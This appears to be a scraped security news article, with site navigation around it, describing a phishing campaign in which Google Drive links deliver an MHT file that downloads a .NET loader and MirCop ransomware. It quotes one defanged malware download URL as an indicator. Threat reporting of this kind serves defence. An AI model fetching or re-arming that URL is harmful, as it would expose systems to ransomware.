CISA orders federal agencies to fix hundreds of exploited security flaws
US sanctions NSO Group and three others for spyware and exploit sales
Some Windows 11 apps are broken due to expired certificate
BlackMatter ransomware claims to be shutting down due to police pressure
Pre-Black Friday Sale: Learn ethical hacking with 120 hours of content
US targets DarkSide ransomware, rebrands with $10 million reward
CISA urges vendors to patch BrakTooth bugs after exploits release
Phishing emails deliver spooky zombie-themed MirCop ransomware
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets
A new phishing campaign pretending to be supply lists infects users with the MirCop ransomware that encrypts a target system in under fifteen minutes.
The actors begin the attack by sending an unsolicited email to the victim, supposedly following up on a previous arrangement about an order.
The email body contains a hyperlink to a Google Drive URL, which, if clicked, downloads an MHT file (webpage archive) onto the victim’s machine.
Google Drive serves to introduce legitimacy to the email and aligns very well with common day-to-day business practices.
For threat actors, simple but key choices like this can distinguish between the victim clicking the URL or sending the email to the spam folder.
Those who open the file can only see a blurred image of what is supposedly a supplier list, stamped and signed for an extra touch of legitimacy.
When the MHT file iis opened, it will download a RAR archive containing a .NET malware downloader from “hXXps://a[.]pomf[.]cat/gectpe.rar”.
The RAR archive contains an EXE file, which uses VBS scripts to drop and execute the MirCop payload onto the infected system.
The ransomware activates immediately and starts taking screenshots, locks files, changes the background to a horrid zombie-themed image, and offers victims instructions on what to do next.
According to Cofense, this whole process takes less than 15 minutes from the moment the victim opens the phishing email.
After that, the user is only allowed to open specific web browsers to communicate with the actors and arrange the payment of the ransom.
The actors are not interested in sneaking into the victim’s machine stealthily or staying there for long to conduct cyber-espionage or steal files for extortion.
On the contrary, the attack unfolds rapidly, and the source of trouble becomes quickly evident to the victim
MicroCop is an old ransomware strain that used to deliver absurd ransom demands onto its victims.
That was until Michael Gillespie cracked its encryption and released a working decryptor for free.
We were unable to test if that old decryptor works with the payloads dropped in the most recent campaign, but it’s possible that it can still unlock the files.
Cofense says the same variant has been in circulation since June this year, so MicroCop is still out there, and people need to be cautious with handling unsolicited emails. 
US targets DarkSide ransomware, rebrands with $10 million reward
Second farming cooperative shut down by ransomware this week
Microsoft Exchange ProxyShell exploits used to deploy Babuk ransomware
Lockean multi-ransomware affiliates linked to attacks on French orgs
Crypto investors lose $500,000 to Google Ads pushing fake wallets
Not a member yet? Register Now
Popular ‘coa’ NPM library hijacked to steal user passwords
BlackMatter ransomware claims to be shutting down due to police pressure
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


You May Also Like

Threat actors offer millions for zero-days, developers talk of exploit-as-a-service

Windows 10 21H2 is released, here are the new featuresNew Rowhammer technique…

CISA releases cybersecurity response plans for federal agencies

Windows 10 21H2 is released, here are the new featuresNew Rowhammer technique…

Russian ransomware gangs start collaborating with Chinese hackers

US, UK warn of Iranian hackers exploiting Microsoft Exchange, FortinetRussian ransomware gangs…

UK government transport website caught showing porn

Hackers exploit Microsoft MSHTML bug to steal Google, Instagram credsApple sues spyware-maker…